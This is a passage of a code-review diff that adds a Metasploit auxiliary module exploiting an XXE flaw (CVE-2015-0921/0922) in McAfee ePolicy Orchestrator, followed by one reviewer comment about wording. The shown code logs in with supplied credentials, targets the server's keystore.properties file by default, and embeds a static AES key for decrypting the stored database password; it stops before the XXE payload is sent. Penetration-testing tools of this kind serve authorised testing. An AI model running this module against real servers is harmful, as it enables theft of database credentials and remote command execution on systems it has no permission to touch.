modules/auxiliary/gather/mcafee_epo_xxe.rb

```diff
@@ -0,0 +1,261 @@
+      user in order to achieve remote command execution with permissions of the database process. If
+      the administrator has no changed the password for the initially created account since installation,
+      the attacker also now has the password for this account. By default, 'admin' is recommended.
+
+      Any user account can be used to exploit this, all that is needed is a pair of credentials.
+
+      The most data that can be successfully retrieved is 255 characters due to length restrictions
+      on the field used to perform the XXE attack.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-0921'],
+          ['CVE', '2015-0922'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/8']
+        ],
+      'DisclosureDate' => 'Jan 6 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('TARGETURI', [ true, "Base ePO directory path", '/']),
+        OptString.new('FILEPATH', [true, "The filepath to read on the server", "C:/Program Files (x86)/McAfee/ePolicy Orchestrator/Server/conf/orion/keystore.properties"]),
+        OptString.new('USERNAME', [true, "The username to authenticate with", "username"]),
+        OptString.new('PASSWORD', [true, "The password to authenticate with", "password"])
+      ], self.class)
+
+  end
+
+  def run
+    key = "\x5E\x9C\x3E\xDF\xE6\x25\x84\x36\x66\x21\x93\x80\x31\x5A\x29\x33" #static key used
+
+    aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB') # ecb, bad bad tsk
+    aes.decrypt
+    aes.padding=1
+    aes.key = key
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'orionSplashScreen.do')
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+    
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'j_security_check'),
+      'method' => 'POST',
+      'vars_post' => {
+        'j_username' => datastore['USERNAME'],
+        'j_password' => datastore['PASSWORD']
+      },
+      'cookie' => cookie
+    })
+
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+    
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'core', 'orionSplashScreen.do'),
+      'cookie' => cookie
+    })
+    
+    unless res
+      fail_with(Failure::Unknown, "Server did not respond in an expected way")
+    end
+
+    if res.code != 302
+      fail_with(Failure::Unknown, 'Authentication failed')
+    end
+
+    cookie = res.get_cookies
+
+    #This vuln requires a bit of setup before we can exploit it
+
+    print_status("Setting up some things...")
```

Comment:
Instead of this message, something like "Setting up environment for exploitation" will be better IMO.